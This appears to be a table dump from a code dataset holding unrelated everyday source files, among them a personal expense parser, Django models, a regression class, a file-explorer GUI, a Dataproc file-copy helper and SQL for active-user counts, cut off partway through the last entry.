index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
12,700 | 160c8da1a3830f5850a0cc5e3bb3eb3007bfb9a8 | #
# Exemplo de como criar classes
#
class minhaClasse():
"""Put inherited melhods, from another class, between brackets
The constructor, for pathern, in the beggining of the class is
__init__(self). This indicates that all methods in my class will
receive the object self, but the python will pass along every
object being instatiaded"""
def __init__(self):
self.meuAtributo = "Passou pelo construtor!"
def meuMetodo(self):
print("Passou pelo meuMetodo")
def meuMetodo2(self, valor):
"""
The methods can receive other parameters as valor
Parameters
----------
valor : TYPE
DESCRIPTION.
Returns
-------
None.
"""
self.outroAtributo = valor
print(self.outroAtributo)
|
12,701 | ecdb5a5c819611868fc90b42225aae0ab3d48fe3 | import sys
from Fund import Fund
from TAA import TAA
# Fonlista som argument
if len(sys.argv) > 1:
fundListPath = str(sys.argv[1])
else:
fundListPath = input("Enter path to fundlist: ")
with open(fundListPath, 'r') as handle:
fundList = []
print("Fetching data", end='', flush=True)
for line in handle:
if line == '\n' or line.startswith('#'):
continue
parts = line.split()
id = parts[0]
name = " ".join(parts[1:])
fundList.append(Fund(id, name))
print('.', end='', flush=True)
fundList = sorted(
fundList, key=lambda fund: fund.getAverageReturns(), reverse=True)
print("\n\n" + Fund.getFormattedHeader())
for fund in fundList:
print(fund.getFormattedData())
print()
unRateData = TAA.getUnRateData()
print("\n\n=== US Unemployment rate ===")
print("Current: " + str(unRateData[0]))
print("MA12: " + str('{:.3f}'.format(unRateData[1])))
if unRateData[0] < unRateData[1]:
print("OK: unrate level is below MA12.\n")
else:
print("WARNING: unrate level is over MA12!\n")
print("Done\n")
|
12,702 | b6154c2cf463da0d511f2928af25d6df97f96199 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import re
import datetime
from functools import total_ordering
import logging
import io
import sys
import csv
import tempfile
import pandas as pd
from dateutil import rrule
from dateutil.relativedelta import relativedelta
DEFAULT_MONEY_TXT_PATH = os.path.join(os.path.expanduser("~"),
"Dropbox/Apps/money.txt-dev/money.txt")
MONEY_TXT_PATH_ENV = "MONEY_TXT_PATH"
DROPBOX_TOKEN_ENV = "MONEY_TXT_DROPBOX_TOKEN"
def get_total(df):
"""Get total current value.
Args:
df: Data frame with all records, including milestones.
Returns:
float total current value.
"""
last_milestone_id = df[df.cmd.notnull()].tail(1).index.get_values()[0]
total = df[last_milestone_id:].value.sum()
return total
@total_ordering
class Entry:
def __init__(self, s=None, date=None):
self.cats = []
self.tags = []
self.day = None
self.value = 0
self.note = ""
self.cmd = None
if s is None:
return
if s.strip() == "":
return
elif s.strip()[0] == '#':
return
cmd_re = re.compile(r'\s*(\d\d\d\d\.\d\d\.\d\d)?\s+!(.*?) +([\(\)\d\+-\.\*,]+)\s*')
entry_re = re.compile(r' *(\d\d\d\d\.\d\d\.\d\d)? *(.*?) +([\(\)\d\+-\.,\*]+)\w*(.*)')
cmd_match = cmd_re.match(s)
if cmd_match is not None:
date_str, self.cmd, value_str = cmd_match.groups()
self.day = datetime.date(*map(int, date_str.split('.')))
self.value = eval(value_str)
else:
try:
date_gr, desc_gr, value_gr, note_gr = entry_re.match(s).groups()
except AttributeError as e:
msg = str(e)
print("Error line: {} ({})".format(s, e))
return
value_gr = value_gr.replace(',', '.')
note_words = list(filter(None, note_gr.split()))
self.day = date if date_gr is None else datetime.date(*map(int, date_gr.split('.')))
self.cats = tuple(filter(None, map(str.strip, desc_gr.split(','))))
self.value = eval(value_gr) if value_gr[0] == '+' else -eval(value_gr)
self.note = ' '.join(filter(lambda x: x[0] != '#', note_words))
self.tags = list(map(lambda x: x[1:], filter(lambda x: x[0] == '#', note_words)))
def __str__(self):
if self.cmd is None:
value_str = "{:.1f}".format(-self.value) if self.value < 0 else "+{:.0f}".format(self.value)
return "{} {} {} {} {}".format(self.day, ','.join(self.cats), value_str,
'' if self.note is None else self.note, ' '.join(map(lambda x: '#'+x, self.tags)))
else:
return "{} !{} {:.1f}".format(self.day, self.cmd, self.value)
def __repr__(self):
return '\n'+str(self.__dict__)
def __eq__(self, other):
return self.cats == other.cats and self.day == other.day and self.tags == other.tags \
and self.value == other.value and self.note == other.note
def __gt__(self, other):
return self.day > other.day
def is_empty(self):
return len(self.cats) == 0 and self.cmd is None
def load_money_txt():
if MONEY_TXT_PATH_ENV in os.environ:
with open(os.environ[MONEY_TXT_PATH_ENV]) as ff:
text = ff.read()
elif DROPBOX_TOKEN_ENV in os.environ:
import dropbox_stuff
text = dropbox_stuff.get_money_txt(os.environ[DROPBOX_TOKEN_ENV])
if text is None:
print('Can not load money.txt from Dropbox')
elif os.path.exists(DEFAULT_MONEY_TXT_PATH):
with open(DEFAULT_MONEY_TXT_PATH) as ff:
text = ff.read()
else:
raise RuntimeError(
"Can not find any of environmental variables: {}. "
"And there is no file at default path {}".format(
', '.join([MONEY_TXT_PATH_ENV, DROPBOX_TOKEN_ENV]),
DEFAULT_MONEY_TXT_PATH))
return text
def save_money_txt(data):
if MONEY_TXT_PATH_ENV in os.environ:
with open(os.environ[MONEY_TXT_PATH_ENV], "w") as ff:
ff.write(data)
elif DROPBOX_TOKEN_ENV in os.environ:
import dropbox_stuff
dropbox_stuff.set_money_txt(os.environ[DROPBOX_TOKEN_ENV], data)
elif os.path.exists(DEFAULT_MONEY_TXT_PATH):
with open(DEFAULT_MONEY_TXT_PATH, "w") as ff:
ff.write(data)
else:
raise RuntimeError(
"Can not find any of environmental variables: {}. "
"And there is no file at default path {}".format(
', '.join([MONEY_TXT_PATH_ENV, DROPBOX_TOKEN_ENV]),
DEFAULT_MONEY_TXT_PATH))
def load_money_txt_lines():
text = load_money_txt()
start_index = text.find("START")
start_index = text.find("\n", start_index)
if start_index != -1:
text = text[start_index:]
return filter(None, text.splitlines())
def load_df():
logging.info("Started loading data frame")
delimiter = ","
def get_temp_file_object():
if sys.version_info[0] > 2:
return io.StringIO()
else:
return tempfile.TemporaryFile("w+")
with get_temp_file_object() as csv_file:
writer = csv.writer(csv_file, delimiter=delimiter)
header = ["date", "cmd", "value", "cat1", "cat2", "cat3", "note", ]
writer.writerow(header)
for line in load_money_txt_lines():
e = Entry(line)
if e.is_empty():
continue
row = [
e.day,
e.cmd,
e.value,
e.cats[0] if len(e.cats) > 0 else None,
e.cats[1] if len(e.cats) > 1 else None,
e.cats[2] if len(e.cats) > 2 else None,
e.note,
]
writer.writerow(row)
csv_file.seek(0)
df = pd.read_csv(csv_file, sep=delimiter)
return df
def split_monthly(period, first_day):
assert len(period) == 2
assert 1 <= first_day <= 28
periods = list()
for dt in rrule.rrule(rrule.MONTHLY, dtstart=period[0],
until=period[1]):
periods.append((dt.date(),
dt.date() + relativedelta(months=1)
- relativedelta(days=1)))
return periods
def for_period(df, first_day, last_day):
first_day_str = first_day.strftime("%Y-%m-%d")
last_day_str = last_day.strftime("%Y-%m-%d")
df["lines_order"] = df.index
df = df.sort_values(["date", "lines_order"])
before_first_day = df[df.date < first_day_str]
if len(before_first_day) == 0:
start_index = 0
else:
start_index = before_first_day.index[-1] + 1
after_last_day = df[df.date > last_day_str]
if len(after_last_day) == 0:
finish_index = df.index[-1]
else:
finish_index = after_last_day.index[0] - 1
return df[start_index:finish_index+1]
def by_cat1(df):
return df.groupby("cat1").sum().sort_values("value")
|
12,703 | acedada367c6aeb6dc9b693a19b043a63b3d77e7 | from django.db import models
import caching.base
# Our apps should subclass ManagerBase instead of models.Manager or
# caching.base.CachingManager directly.
ManagerBase = caching.base.CachingManager
class ModelBase(caching.base.CachingMixin, models.Model):
"""
Base class for doozer models to abstract some common features.
* Caching.
"""
objects = ManagerBase()
uncached = models.Manager()
class Meta:
abstract = True
class TimestampMixin(models.Model):
"""Mixin to add created and updated fields."""
created = models.DateTimeField(db_index=True, auto_now_add=True)
updated = models.DateTimeField(db_index=True, auto_now=True)
class Meta(object):
abstract = True
|
12,704 | f1a173b36500a7d67a74ca297d17dd796e4975b4 | from numpy import sqrt
import numpy as np
class Regression_lineaire:
def __init__(self, x:np.array, y:np.array, dy=1):
assert x.shape == y.shape
self.x = x
self.y = y
self.dy = dy if isinstance(dy, np.ndarray) else np.ones(x.shape[0]) * dy
self._delta = (1 / dy**2).sum() * (x**2 / dy**2).sum() - ((x / dy**2).sum())**2
def pente(self):
return \
1 / self._delta \
* ( \
(1 / self.dy**2).sum() \
* (self.x * self.y / self.dy**2).sum() \
- (self.x / self.dy**2).sum() \
* (self.y / self.dy**2).sum() \
)
def sigma_pente(self):
return sqrt(1 / self._delta * (1 / self.dy**2).sum())
def intercept(self):
return \
1 / self._delta \
* ( \
(self.x**2 / self.dy**2).sum() \
*(self.y / self.dy**2).sum() \
- (self.x / self.dy**2).sum() \
*(self.x * self.y / self.dy**2).sum() \
)
def sigma_intercept(self):
return sqrt(1 / self._delta * (self.x**2 / self.dy**2).sum())
def y_hat(self, x):
return self.pente() * x + self.intercept()
def sigma_y_hat(self, x):
return sqrt(self.sigma_intercept()**2 + (self.sigma_pente() * x)**2 \
+ 2 * self.covariance_pente_intercept() * self.sigma_intercept() * (self.sigma_pente() * x))
def R_squared(self):
"""
This is the R^2 test, which measures how much of the variance in y is explained by the model f.
It runs from 1 to -1, both being good while 0 is very bad
"""
return 1 - ((self.y - self.y_hat(self.x))**2).sum() / ((self.y - self.y.mean())**2).sum()
def pearson_r(self):
"""
This is a standard correlation test beteween x and y. A value of 1 or -1 implies that a linear model describes perfectly the data,
while a value of 0 implies there is no correlation between x and y
"""
return ((self.x - self.x.mean()) * (self.y - self.error_weighted_average(self.y, self.dy))).sum() / self.x.std() / self.y.std()
def chi_squared_reduced(self):
return (((y - a - b * x) / dy)**2).sum() / (x.size - 2)
def covariance_pente_intercept(self):
return - 1 / ((1 / self.dy)**2).sum() * self.x.mean() / ((self.x**2).mean() - (self.x).mean()**2)
@staticmethod
def error_weighted_average(x, sigma_x):
return (x / sigma_x**2).sum() / (1 / sigma_x**2).sum()
if __name__ == "__main__":
# Small tests to make sure this class works well
x = np.linspace(10, 50000, 200)
dy = np.random.normal(0, 1.5, 200)
y = np.linspace(10, 50000, 200) + dy
rl = Regression_lineaire(x, y, dy)
print("Pente: %.1f +/- %.1e" % (rl.pente(), rl.sigma_pente()))
print("Intercept %.1f +/- %.1e" % (rl.intercept(), rl.sigma_intercept()))
assert rl.pente() >= 0
assert abs(rl.pente() - 1) <= 0.1
assert abs(rl.intercept()) <= 0.5, rl.intercept()
assert rl.sigma_y_hat(5) <= 0.1, rl.sigma_y_hat(5)
assert abs(rl.y_hat(5) - 5) <= 0.1
assert rl.pearson_r() >= 0.9
assert rl.R_squared() >= 0.9
|
12,705 | 73a0fe5400c9332e050f6b61ca22c18c5defa640 | #!/usr/bin/env python3
# -- coding utf-8 --
if __name__ == "__main__":
fileOut = open("e10.txt", "w")
fileIn = open("e10.txt", "r")
strWrited = "Hello World.\n"
print("write:" + strWrited, end = "")
fileOut.write(strWrited)
strWrited = "012345\n"
print("write:" + strWrited)
fileOut.write(strWrited)
for line in fileIn.readline():
print("read:" + line, end = "")
fileIn.close()
fileOut.close()
|
12,706 | 2b4854813ba48b7b1bd13ab62f32a5dd87a21fa2 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.2 on 2016-02-18 11:14
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0002_effectsmodel'),
]
operations = [
migrations.AlterField(
model_name='effectsmodel',
name='effect',
field=models.FileField(upload_to=b'effects/%Y/%m/%d'),
),
]
|
12,707 | a30d7920c12d21218409534f16d0d6ed3f876fff | from karel.stanfordkarel import *
def main():
i = 0
while True:
# repeat
i = i + 1
if beepers_present(): # At a black square
pick_beeper() # flip the color of the square
turn_left() # turn 90° left
move() # move forward one unit
else: # At a white square
put_beeper() # flip the color of the square
turn_right() # turn 90° right
move() # move forward one unit
if i == 10900:
break
def turn_right():
for i in range(3):
turn_left()
if __name__ == "__main__":
run_karel_program('2x8.w')
|
12,708 | ea49bc30c141a2b749a0ba319d2bdcc642f801b8 | # -*- coding: iso-8859-15 -*-
from flask import Flask
import pyodbc
app = Flask(__name__)
app.config.from_pyfile('config.py')
db = pyodbc.connect(app.config['DSN'])
from views import *
if __name__ == "__main__":
#app.run(host='0.0.0.0', port=8080)
app.run(debug=True)
|
12,709 | ef09bd322d26d5b84f1ea31dc19e508e27b576a6 |
n,m=map(int,input().split())
s=input()[:n]
s=list(s)
#print(s)
d=""
while m>0:
for j in range(len(s)-1):
if (s[j]=='B' and s[j+1]=='G'):
s[j],s[j+1]=s[j+1],s[j]
j+=1
j+=1
m-=1
print(s)
for i in range(len(s)):
d+=s[i]
print(d)
|
12,710 | ff1acbcda057aa435a72624424e385566c6e8167 | import PySimpleGUI as sg
from utils import find_all_subdirectories, find_files
import datetime
layout = [
[sg.Text('File Explorer - Find files/directories on your drive', font=("Arial", 20))],
[sg.Text('Choose the path', font=("Arial", 14)), sg.InputText("", size=(40, 1), font=("Arial", 14), key='path',
disabled=True, enable_events=True),
sg.FolderBrowse(font=("Arial", 14))],
[sg.Text('Enter a filter expression (for example: .jpg or .txt using wildcards)', font=("Arial", 14)),
sg.InputText("", font=("Arial", 14), size=(10, 1), key='filter', enable_events=True)],
[sg.Checkbox('Display Directories', font=("Arial", 14), key='directories'),
sg.Button("Find...", font=("Arial", 14), bind_return_key=True, key='find'),
sg.Button("Clear", font=("Arial", 14), bind_return_key=True, key='clear')],
[sg.Output(font=("Arial", 14), size=(80, 15), key='output')]
]
def get_current_date():
dt = datetime.datetime.now()
date = dt.strftime("%Y-%m-%d %H:%M")
return date
def display_files_directories(path, filter_expr):
directories, files, stats = find_all_subdirectories(path, filter_expr)
date = get_current_date()
for directory in directories:
print(date + "\t" + "<DIR>\t" + directory)
for file, size in files.items():
print(date + "\t" + "<FILE>\t" + file + "\t\t" + str(size) + " bytes")
print()
print(str(stats['total_files']) + " File(s)" + '\t' + str(stats['total_file_size']) + " bytes")
print(str(stats['total_directories']) + " Dir(s)" + '\t' + str(stats['free_disk_space']) + " bytes free")
def display_files(path, filter_expr):
date = get_current_date()
files, stats = find_files(path, filter_expr)
for file, size in files.items():
print(date + "\t" + "<FILE>\t" + file + "\t\t" + str(size) + " bytes")
print()
print(str(stats['total_files']) + "File(s)" + '\t' + str(stats['total_file_size']) + " bytes")
print(str(stats['free_disk_space']) + " bytes free")
def display_details(values):
path = values['path']
filter_expr = values['filter']
window['output'].Update('')
if values['directories']:
display_files_directories(path, filter_expr)
else:
display_files(path, filter_expr)
if __name__ == '__main__':
window = sg.Window('File Explorer', layout)
while True:
event, values = window.Read()
if event == sg.WINDOW_CLOSED:
break
elif event == 'find':
display_details(values)
elif event == 'clear':
window['output'].Update('')
window.Close()
|
12,711 | c318a78fdbe26b21499ca0d5aac77d68ebeb32f7 | from albumGrabberOOP import albumGetter
instance = albumGetter()
instance.start() |
12,712 | 4389879084e4ad90d71d59c59b9d8346ae79aaf7 | import os
import sys
from subprocess import Popen, check_call
def init_parser(parser):
parser.add_argument('name', type=str, help='Cluster name.')
parser.add_argument('--jar', type=str, help='New JAR.')
parser.add_argument('--zip', type=str, help='New ZIP.')
parser.add_argument('--zone', '-z', default='us-central1-b', type=str,
help='Compute zone for Dataproc cluster (default: %(default)s).')
def main(args):
if (args.jar is not None):
_scp_and_sudo_move(args.jar, args.name, '/home/hail/hail.jar', args.zone)
if (args.zip is not None):
_scp_and_sudo_move(args.zip, args.name, '/home/hail/hail.zip', args.zone)
# user doesn't have access to /home/hail/ so we copy then use sudo
def _scp_and_sudo_move(source, destination_host, destination, zone):
if source.startswith("gs://"):
cmd = [
'gcloud',
'compute',
'ssh',
'{}-m'.format(destination_host),
'--zone={}'.format(zone),
'--',
'sudo gsutil cp {} {}'.format(source, destination)
]
check_call(cmd, stdout=sys.stdout, stderr=sys.stderr)
else:
cmd = [
'gcloud',
'compute',
'scp',
'--zone={}'.format(zone),
source,
'{}-m:/tmp/foo'.format(destination_host)
]
check_call(cmd, stdout=sys.stdout, stderr=sys.stderr)
cmd = [
'gcloud',
'compute',
'ssh',
'{}-m'.format(destination_host),
'--zone={}'.format(zone),
'--',
'sudo mv /tmp/foo {}'.format(destination)
]
check_call(cmd, stdout=sys.stdout, stderr=sys.stderr)
|
12,713 | 52200136624ddd0ce310a5da6f0767550357714b | class Solution:
def relativeSortArray(self, arr1: List[int], arr2: List[int]) -> List[int]:
retList = []
for i in arr2:
## 利用remove自动寻找值的特性,一直找到没空为止就跳出循环
while True:
try:
arr1.remove(i)
retList.append(i)
except:
break
retList += sorted(arr1)
return retList
if __name__ == '__main__':
arr1 = [2,3,1,3,2,4,6,7,9,2,19]
arr2 = [2,1,4,3,9,6]
ret = Solution().relativeSortArray(arr1, arr2)
print(ret) |
12,714 | a8ebe9dac46494f56d8499c851a91fe1e6bcba12 | from django.apps import AppConfig
class GestionmachinesConfig(AppConfig):
name = 'gestionMachines'
|
12,715 | af9e00cb7754c7a05f15c8c2672b5555b86897a7 | class Solution:
def maximumNumberOfOnes(self, width: int, height: int, sideLength: int, maxOnes: int) -> int:
matrix1 = [[0 for _ in range(sideLength)] for _ in range(sideLength)]
for i in range(height):
for j in range(width):
matrix1[i%sideLength][j%sideLength] -= 1
heap = []
for i in range(sideLength):
for j in range(sideLength):
heap.append((matrix1[i][j], i, j))
heapq.heapify(heap)
matrix2 = [[0 for _ in range(sideLength)] for _ in range(sideLength)]
for _ in range(maxOnes):
_, i, j = heapq.heappop(heap)
matrix2[i][j] = 1
ans = 0
for i in range(height):
for j in range(width):
ans += matrix2[i % sideLength][j % sideLength] == 1
return ans |
12,716 | 2bb03149ab7de8b7a576dd7f20b248d2dc1e0c3c | print("How old are you?",end = ' ')
age = input()
name = input("What's your name? ")
print(f"Your name is {name}, your age is {age}.")
|
12,717 | 613f2b62b192a0ad34b481344ae5bb5647651673 | import string
class Cesar:
def __init__(self, word, key):
self.word = word
self.key = key
def get_shifr(self):
shifrword = ""
self.key = self.key%26
for i in self.word:
c = ord(i)
if i in string.ascii_letters:
ci = (c + self.key)
if 97<=ci<=122 or 65 <= ci <= 90:
shif = chr(ci)
else:
ci = ci-26
shif = chr(ci)
else:
shif = chr(c)
shifrword += shif
return shifrword
shifr = Cesar(input("Введіть слово яке потрібно зашифрувати>> "), int(input("Введіть ключ>> ")))
print(shifr.get_shifr())
|
12,718 | fa63c99853a90e8caa517269883cb4f119037e3b | from django.shortcuts import redirect
from django.views import View
class logout(View):
def get(self, request):
request.session.clear()
return redirect('/authen/login/') |
12,719 | 176a4b48fa34583cd8cd740486b23d11cc840f4c | from django.urls import reverse_lazy
from django.views.generic import CreateView, ListView, DetailView
from .models import Post
class PostCreateView(CreateView):
model = Post
fields = ('title', 'content')
success_url = reverse_lazy('index')
class PostListView(ListView):
model = Post
class PostDetailView(DetailView):
model = Post
|
12,720 | 0596ab37032b552533aeef5f5713ba67e37d3ed0 | import sys
'''Displays any image file that PIL can understand. Doesn't display
transparency well, so try showing that on a web browser.'''
try:
# This works on the Linux machines
from PIL import Image
except:
print "Couldn't import PIL.Image"
sys.exit()
def showimage(filename):
img = Image.open(filename)
print "converting %s which is format %s (%s) and dimensions %s" % (
filename,
img.format_description,
img.format,
img.getbbox())
img.show()
if __name__ == '__main__':
showimage(sys.argv[1])
|
12,721 | 5b229b01cca71c88c687d03c2a97a54746885deb | import sys
def decode(code, key):
decoded_string = str()
for i in code:
decoded_string += key[int(i) - 1]
return decoded_string
test_cases = open(sys.argv[1], 'r')
for test in test_cases:
if not test:
continue
key = test.strip().split('|')[0]
code = test.strip().split('|')[1].strip().split(' ')
print(decode(code, key))
test_cases.close() |
12,722 | 204661714d8c151a1cc3a77f64837a715e1e74cd |
import time
from util.util_list import *
from util.util_tree import *
import copy
import collections
class Solution:
def maximumWealth(self, accounts: [[int]]) -> int:
mx = 0
for account in accounts:
mx = max(mx, sum(account))
return mx
stime = time.time()
print(6 == Solution().maximumWealth([[1,2,3],[3,2,1]]))
print('elapse time: {} sec'.format(time.time() - stime)) |
12,723 | 6a086ee43581e230337032e2d6f2af2a3eda43cb | # Copyright (c) 2021 - present / Neuralmagic, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Code related to base functionality for making requests
"""
from typing import Any, List, Union
__all__ = ["BASE_API_URL", "ModelArgs"]
BASE_API_URL = "https://api.neuralmagic.com/models"
class ModelArgs:
"""
Arguments for making requests into the sparsezoo
:param domain: The domain of the model the object belongs to;
e.g. cv, nlp
:param sub_domain: The sub domain of the model the object belongs to;
e.g. classification, segmentation
:param architecture: The architecture of the model the object belongs to;
e.g. resnet_v1, mobilenet_v1
:param sub_architecture: The sub architecture (scaling factor) of the model
the object belongs to; e.g. 50, 101, 152
:param framework: The framework the model the object belongs to was trained on;
e.g. pytorch, tensorflow
:param repo: the source repo for the model the object belongs to;
e.g. sparseml, torchvision
:param dataset: The dataset the model the object belongs to was trained on;
e.g. imagenet, cifar10
:param training_scheme: The training scheme used on the model the object belongs
to if any; e.g. augmented
:param optim_name: The name describing the optimization of the model
the object belongs to, e.g. base, pruned, pruned_quant,
:param optim_category: The degree of optimization of the model the object
belongs to; e.g. none, conservative (~100% baseline metric),
moderate (>=99% baseline metric), aggressive (<99% baseline metric)
:param optim_target: The deployment target of optimization of the model
the object belongs to; e.g. edge, deepsparse, deepsparse_throughput, gpu
:param release_version: The sparsezoo release version for the model
"""
def __init__(
self,
domain: Union[str, None] = None,
sub_domain: Union[str, None] = None,
architecture: Union[str, List[str], None] = None,
sub_architecture: Union[str, List[str], None] = None,
framework: Union[str, List[str], None] = None,
repo: Union[str, List[str], None] = None,
dataset: Union[str, List[str], None] = None,
training_scheme: Union[str, List[str], None] = None,
optim_name: Union[str, List[str], None] = None,
optim_category: Union[str, List[str], None] = None,
optim_target: Union[str, List[str], None] = None,
release_version: Union[str, Any, None] = None,
**kwargs,
):
self._domain = domain
self._sub_domain = sub_domain
self._architecture = architecture
self._sub_architecture = sub_architecture
self._framework = framework
self._repo = repo
self._dataset = dataset
self._training_scheme = training_scheme
self._optim_name = optim_name
self._optim_category = optim_category
self._optim_target = optim_target
self._release_version = release_version
@property
def domain(self) -> Union[str, None]:
"""
:return: The domain of the model the object belongs to;
e.g. cv, nlp
"""
return self._domain
@property
def sub_domain(self) -> Union[str, None]:
"""
:return: The sub domain of the model the object belongs to;
e.g. classification, segmentation
"""
return self._sub_domain
@property
def architecture(self) -> Union[str, List[str], None]:
"""
:return: The architecture of the model the object belongs to;
e.g. resnet_v1, mobilenet_v1
"""
return self._architecture
@property
def sub_architecture(self) -> Union[str, List[str], None]:
"""
:return: The sub architecture (scaling factor) of the model
the object belongs to; e.g. 50, 101, 152
"""
return self._sub_architecture
@property
def framework(self) -> Union[str, List[str], None]:
"""
:return: The framework the model the object belongs to was trained on;
e.g. pytorch, tensorflow
"""
return self._framework
@property
def repo(self) -> Union[str, List[str], None]:
"""
:return: the source repo for the model the object belongs to;
e.g. sparseml, torchvision
"""
return self._repo
@property
def dataset(self) -> Union[str, List[str], None]:
"""
:return: The dataset the model the object belongs to was trained on;
e.g. imagenet, cifar10
"""
return self._dataset
@property
def training_scheme(self) -> Union[str, List[str], None]:
"""
:return: The training scheme used on the model the object belongs to if any;
e.g. augmented
"""
return self._training_scheme
@property
def optim_name(self) -> Union[str, List[str], None]:
"""
:return: The name describing the optimization of the model
the object belongs to, e.g. base, pruned, pruned_quant
"""
return self._optim_name
@property
def optim_category(self) -> Union[str, List[str], None]:
"""
:return: The degree of optimization of the model the object belongs to;
e.g. none, conservative (~100% baseline metric),
moderate (>=99% baseline metric), aggressive (<99% baseline metric)
"""
return self._optim_category
@property
def optim_target(self) -> Union[str, List[str], None]:
"""
:return: The deployment target of optimization of the model
the object belongs to; e.g. edge, deepsparse, deepsparse_throughput, gpu
"""
return self._optim_target
@property
def release_version(self) -> Union[str, None]:
"""
:return: The sparsezoo release version for the model
"""
return self._release_version
@property
def architecture_id(self) -> str:
"""
:return: Unique id for the model architecture containing both the
architecture and sub_architecture
"""
if not self.architecture:
return ""
if not self.sub_architecture:
return f"{self.architecture}"
return f"{self.architecture}-{self.sub_architecture}"
@property
def training_id(self) -> str:
"""
:return: Unique id for how the model was trained containing both the
dataset and training_scheme
"""
if not self.dataset:
return ""
if not self.training_scheme:
return f"{self.dataset}"
return f"{self.dataset}-{self.training_scheme}"
@property
def optimization_id(self) -> str:
"""
:return: Unique id for how the model was optimized containing the
optim_name, optim_category, optim_target
"""
if not self.optim_name:
return ""
if not self.optim_category:
return f"{self.optim_name}"
if not self.optim_target:
return f"{self.optim_name}-{self.optim_category}"
return f"{self.optim_name}-{self.optim_category}-{self.optim_target}"
@property
def model_url_root(self) -> str:
"""
:return: root path for where the model is located in the sparsezoo
"""
if not self.domain:
return ""
if not self.sub_domain:
return f"{self.domain}"
return f"{self.domain}/{self.sub_domain}"
@property
def stub(self) -> str:
"""
:return: full path for where the model is located in the sparsezoo
"""
return "/".join(
[
self.model_url_root,
self.architecture_id,
f"{self.framework}" if self.framework else "",
f"{self.repo}" if self.repo else "",
self.training_id,
self.optimization_id,
]
)
@property
def model_url_args(self) -> List[str]:
"""
:return: arguments for searching in the sparsezoo
"""
args = []
for key in [
"architecture",
"sub_architecture",
"framework",
"repo",
"dataset",
"training_scheme",
"optim_name",
"optim_category",
"optim_target",
]:
value = getattr(self, key)
if value and isinstance(value, List):
args.extend([f"{key}={item}" for item in value])
elif value:
args.append(f"{key}={value}")
return args
|
12,724 | d8f9c39a541b3a9b67c6533f69a8f2df4c453817 | """Data related to the development."""
import typing as t
from datetime import datetime
from mimesis.data import (
LICENSES,
OS,
PROGRAMMING_LANGS,
SYSTEM_QUALITY_ATTRIBUTES,
)
from mimesis.enums import DSNType
from mimesis.providers.base import BaseProvider
from mimesis.providers.internet import Internet
__all__ = ["Development"]
class Development(BaseProvider):
"""Class for getting fake data for Developers."""
def __init__(self, *args: t.Any, **kwargs: t.Any) -> None:
super().__init__(*args, **kwargs)
self._internet = Internet(
random=self.random,
*args,
**kwargs,
)
self._now = datetime.now()
class Meta:
name = "development"
def dsn(self, dsn_type: t.Optional[DSNType] = None, **kwargs: t.Any) -> str:
"""Generates a random DSN (Data Source Name).
:param dsn_type: DSN type.
:param kwargs: Additional arguments for Internet.hostname().
"""
hostname = self._internet.hostname(**kwargs)
scheme, port = self.validate_enum(dsn_type, DSNType)
return f"{scheme}://{hostname}:{port}"
def software_license(self) -> str:
"""Get a random software license.
:return: License name.
:Example:
The BSD 3-Clause License.
"""
return self.random.choice(LICENSES)
def version(self, calver: bool = False, pre_release: bool = False) -> str:
"""Generate version number.
:param calver: Calendar versioning.
:param pre_release: Pre-release.
:return: Version.
:Example:
0.2.1
"""
if calver:
major = self.random.randint(2016, self._now.year)
minor, patch = self.random.randints(2, 1, 10)
else:
major, minor, patch = self.random.randints(3, 0, 10)
version = f"{major}.{minor}.{patch}"
if pre_release:
suffix = self.random.choice(("alpha", "beta", "rc"))
number = self.random.randint(1, 11)
version = f"{version}-{suffix}.{number}"
return version
def programming_language(self) -> str:
"""Get a random programming language from the list.
:return: Programming language.
:Example:
Erlang.
"""
return self.random.choice(PROGRAMMING_LANGS)
def os(self) -> str:
"""Get a random operating system or distributive name.
:return: The name of OS.
:Example:
Gentoo
"""
return self.random.choice(OS)
def boolean(self) -> bool:
"""Get a random boolean value.
:return: True of False.
"""
return self.random.choice([True, False])
def system_quality_attribute(self) -> str:
"""Get a random system quality attribute.
Within systems engineering, quality attributes are realized
non-functional requirements used to evaluate the performance
of a system. These are sometimes named "ilities" after the
suffix many of the words share.
:return: System quality attribute.
"""
return self.random.choice(SYSTEM_QUALITY_ATTRIBUTES)
def ility(self) -> str:
"""Get a random system quality attribute.
An alias for system_quality_attribute().
"""
return self.system_quality_attribute()
|
12,725 | c3c4e4f8c6425dac1e5dd9fb8a795f929153b01a | eat_activeusers_daily = """
SELECT %s s_day, count(distinct(user_id)) active_users
FROM log_record
WHERE log_time_in_millisecond >= %s
AND log_time_in_millisecond < %s
AND user_id IS NOT NULL
"""
insert_eat_activeusers_daily = """
insert into huoli_eat_activeusers_daily_test values (%s, %s, now(), now())
on duplicate key update updatetime = now() ,
s_day = VALUES(s_day),
active_users = VALUES(active_users)
"""
eat_activeusers_weekly = """
SELECT %s s_day, count(distinct(user_id)) active_users
FROM log_record
WHERE log_time_in_millisecond >= %s
AND log_time_in_millisecond < %s
AND user_id IS NOT NULL
"""
insert_eat_activeusers_weekly = """
insert into huoli_eat_activeusers_weekly_test values (%s, %s, now(), now())
on duplicate key update updatetime = now() ,
s_day = VALUES(s_day),
active_users = VALUES(active_users)
"""
eat_activeusers_monthly = """
SELECT %s s_day, count(distinct(user_id)) active_users
FROM log_record
WHERE log_time_in_millisecond >= %s
AND log_time_in_millisecond < %s
AND user_id IS NOT NULL
"""
insert_eat_activeusers_monthly = """
insert into huoli_eat_activeusers_monthly_test values (%s, %s, now(), now())
on duplicate key update updatetime = now() ,
s_day = VALUES(s_day),
active_users = VALUES(active_users)
"""
eat_activeusers_quarterly = """
SELECT CONCAT(YEAR(%s),',','Q',QUARTER(%s)) s_day, count(distinct(user_id)) active_users
FROM log_record
WHERE log_time_in_millisecond >= %s
AND log_time_in_millisecond < %s
AND user_id IS NOT NULL
"""
insert_eat_activeusers_quarterly = """
